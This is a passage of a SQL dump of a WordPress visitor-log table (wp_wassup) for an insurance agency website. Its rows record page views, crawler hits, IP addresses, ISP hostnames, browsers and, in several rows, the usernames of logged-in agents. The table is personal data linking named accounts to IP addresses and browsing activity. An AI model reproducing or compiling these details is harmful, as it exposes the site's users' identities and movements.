Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(24213,'0b_9d7e2606599088bc10cb23d814c0fccc','1462288761','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(24215,'0b_9d7e2606599088bc10cb23d814c0fccc','1462288763','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(24216,'0b_226af3b422796d8184ed4b65a72ec3a6','1462288866','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(24219,'0b_226af3b422796d8184ed4b65a72ec3a6','1462288868','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(24222,'0b_9ae783813cefa5cd13ee959303e2c04d','1462291189','184.75.10.76','rrcs-184-75-10-76.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 50','us','','Google','','','','','0','0',0),(24225,'0b_9ae783813cefa5cd13ee959303e2c04d','1462291191','184.75.10.76','rrcs-184-75-10-76.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 50','us','','','','','','','0','0',0),(24228,'0b_b6ce64f08adc1b61c422df07b22da6b6','1462291383','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(24231,'0b_b6ce64f08adc1b61c422df07b22da6b6','1462291384','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(24233,'0b_b6ce64f08adc1b61c422df07b22da6b6','1462291390','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','0',0),(24234,'0b_b6ce64f08adc1b61c422df07b22da6b6','1462291509','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(24236,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462291583','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24237,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462291584','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24240,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462291591','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24243,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462291598','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(24245,'0b_67a28d863de88cf62246d9bbd09a2250','1462294757','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24248,'0b_67a28d863de88cf62246d9bbd09a2250','1462294760','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24249,'0b_67a28d863de88cf62246d9bbd09a2250','1462294794','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24252,'0b_67a28d863de88cf62246d9bbd09a2250','1462294795','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24254,'0b_245c8c141d58c84836dd78cd2ad0997e','1462294813','67.83.103.143','ool-4353678f.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','','','0','0',0),(24257,'0b_4e51623b045efa3885ba114378f4b7ca','1462294986','67.86.154.190','ool-43569abe.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','0',0),(24260,'0b_57f461c351784b7734f0d91e613466dc','1462294989','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(24261,'0b_245c8c141d58c84836dd78cd2ad0997e','1462294989','67.83.103.143','ool-4353678f.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(24264,'0b_245c8c141d58c84836dd78cd2ad0997e','1462294990','67.83.103.143','ool-4353678f.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(24266,'0b_57f461c351784b7734f0d91e613466dc','1462294994','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(24269,'0b_57f461c351784b7734f0d91e613466dc','1462294995','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(24272,'0b_245c8c141d58c84836dd78cd2ad0997e','1462295015','67.83.103.143','ool-4353678f.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','0',0),(24273,'0b_a9f6737a11cd18b3b86a827c9223095b','1462295034','67.83.103.143','ool-4353678f.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(24276,'0b_57f461c351784b7734f0d91e613466dc','1462295047','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24279,'0b_245c8c141d58c84836dd78cd2ad0997e','1462295066','67.83.103.143','ool-4353678f.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','','','0','51',0),(24282,'0b_a9f6737a11cd18b3b86a827c9223095b','1462295114','67.83.103.143','ool-4353678f.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(24285,'0b_6e465511cbb6100d5ba14f5c986c836a','1462295193','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/robots.txt','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(24287,'0b_7b7ba5cd36549a3c81a50fdb7056fb88','1462298284','66.249.64.160','crawl-66-249-64-160.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24290,'0b_7b7ba5cd36549a3c81a50fdb7056fb88','1462298331','66.249.64.160','crawl-66-249-64-160.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24293,'0b_9d7e2606599088bc10cb23d814c0fccc','1462298353','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(24296,'0b_9d7e2606599088bc10cb23d814c0fccc','1462298354','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(24299,'0b_3ae933845ddd656b033fd05c70b4250e','1462298393','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','joel32','','0','0',0),(24300,'0b_3ae933845ddd656b033fd05c70b4250e','1462298397','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joel32','','0','0',0),(24302,'0b_3ae933845ddd656b033fd05c70b4250e','1462298403','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joel32','','0','0',0),(24303,'0b_3ae933845ddd656b033fd05c70b4250e','1462298411','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joel32','','0','51',0),(24305,'0b_3ae933845ddd656b033fd05c70b4250e','1462299363','100.33.27.80','pool-100-33-27-80.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','joel32','','0','51',0),(24306,'0b_4643af4698188f90de064c1eca18410d','1462300108','192.227.211.37','192-227-211-37-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24309,'0b_39e88ded2365e375c331345ec2506d93','1462300108','104.168.56.135','104-168-56-135-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24311,'0b_760b897edd580e5625b9104e1e4c3488','1462300620','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24314,'0b_760b897edd580e5625b9104e1e4c3488','1462300623','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(24315,'0b_760b897edd580e5625b9104e1e4c3488','1462300629','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0); INSERT INTO `wp_wassup` VALUES (24318,'0b_760b897edd580e5625b9104e1e4c3488','1462300646','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(24321,'0b_80252416a95a9aa89cb3dc9376c15c9c','1462302512','66.249.64.209','crawl-66-249-64-209.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24324,'0b_80252416a95a9aa89cb3dc9376c15c9c','1462302515','66.249.64.209','crawl-66-249-64-209.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24327,'0b_0d68d8daf8f757359e8a002e0084edb0','1462302571','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)','http://gsmtlf.ru/','',0,'Win2000','IE 5','','','','','','','','0','0',0),(24330,'0b_ace8ce1795b33c02a70728808cdd97b8','1462302910','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24333,'0b_ace8ce1795b33c02a70728808cdd97b8','1462302911','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24336,'0b_440c5135718622d6eb0bfc29ca0092d7','1462303278','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(24338,'0b_440c5135718622d6eb0bfc29ca0092d7','1462303281','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24339,'0b_290b92c55355e897bae1fb5d14143ae0','1462303400','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24342,'0b_290b92c55355e897bae1fb5d14143ae0','1462303401','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24345,'0b_440c5135718622d6eb0bfc29ca0092d7','1462303524','24.189.48.254','ool-18bd30fe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(24347,'0b_3e830a8831211d6d321450e417e18ace','1462303841','180.76.15.148','baiduspider-180-76-15-148.crawl.baidu.com','/term-quotes/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(24350,'0b_8d8a5ed56921c84603d13cd88219ab90','1462304248','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(24351,'0b_8d8a5ed56921c84603d13cd88219ab90','1462304250','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24354,'0b_11ca58564b7ebb50554d7413838cd191','1462304252','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24356,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304258','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 50','us','1366 x 768','Google','','','','','0','0',0),(24359,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304261','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','0',0),(24360,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304271','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 50','us','1366 x 768','Google','','','','','0','0',0),(24362,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304272','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','0',0),(24363,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304285','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','51',0),(24366,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304286','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','0',0),(24368,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304316','75.99.148.62','ool-4b63943e.static.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','51',0),(24369,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304328','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','51',0),(24372,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304329','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','0',0),(24375,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304344','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','51',0),(24377,'0b_1ed99e33dd51294e98f2a525c95b930b','1462304344','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1366 x 768','','','','','','0','0',0),(24378,'0b_d290c0d1fb99f36da669d2fcaa1d31b4','1462304654','108.46.224.248','pool-108-46-224-248.nycmny.fios.verizon.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.referenceusa.com/UsBusiness/Detail/Tagged/0767400a81d84d9cb701d15f888dcb07?recordId=633318183','',0,'MacOSX','Safari 9','us','1280 x 800','','','','','','0','0',0),(24380,'0b_d290c0d1fb99f36da669d2fcaa1d31b4','1462304656','108.46.224.248','pool-108-46-224-248.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1280 x 800','','','','','','0','0',0),(24383,'0b_d290c0d1fb99f36da669d2fcaa1d31b4','1462304666','108.46.224.248','pool-108-46-224-248.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1280 x 800','','','','','','0','0',0),(24384,'0b_fad95b825f6eae893ec8acfad7b8a43f','1462305153','122.176.94.33','abts-north-static-033.94.176.122.airtelbroadband.in','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','','',0,'Linux','Chrome 42','in','','','','','','','0','0',0),(24386,'0b_de74897c707d1e192c7d50114f7a6db7','1462305174','70.39.157.196','70.39.157.196','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(24389,'0b_9d7e2606599088bc10cb23d814c0fccc','1462306005','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(24392,'0b_d8c05a5d5be50fb5ae5a955dff9e9f05','1462306171','74.65.207.82','cpe-74-65-207-82.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24393,'0b_c1e0a38efa93a05051aff8bdff4af12b','1462306446','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24396,'0b_c1e0a38efa93a05051aff8bdff4af12b','1462306447','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24398,'0b_c1e0a38efa93a05051aff8bdff4af12b','1462306467','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24401,'0b_c1e0a38efa93a05051aff8bdff4af12b','1462306468','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24402,'0b_699af58915d246995c5b00ee225023fc','1462306761','69.58.178.59','69.58.178.59','/robots.txt','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24404,'0b_699af58915d246995c5b00ee225023fc','1462306774','69.58.178.59','69.58.178.59','/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24407,'0b_5ac7f982d20d6abd83cd23b8b474a994','1462306787','69.58.178.59','69.58.178.59','/','BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent','','',0,'BlackBerry','BlackBerry','','','','','','','','0','0',0),(24410,'0b_699af58915d246995c5b00ee225023fc','1462306798','69.58.178.59','69.58.178.59','/about-us/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(24413,'0b_699af58915d246995c5b00ee225023fc','1462306809','69.58.178.59','69.58.178.59','/contact/','Mozilla/5.0 (X11; Ubuntu; Linux i686; 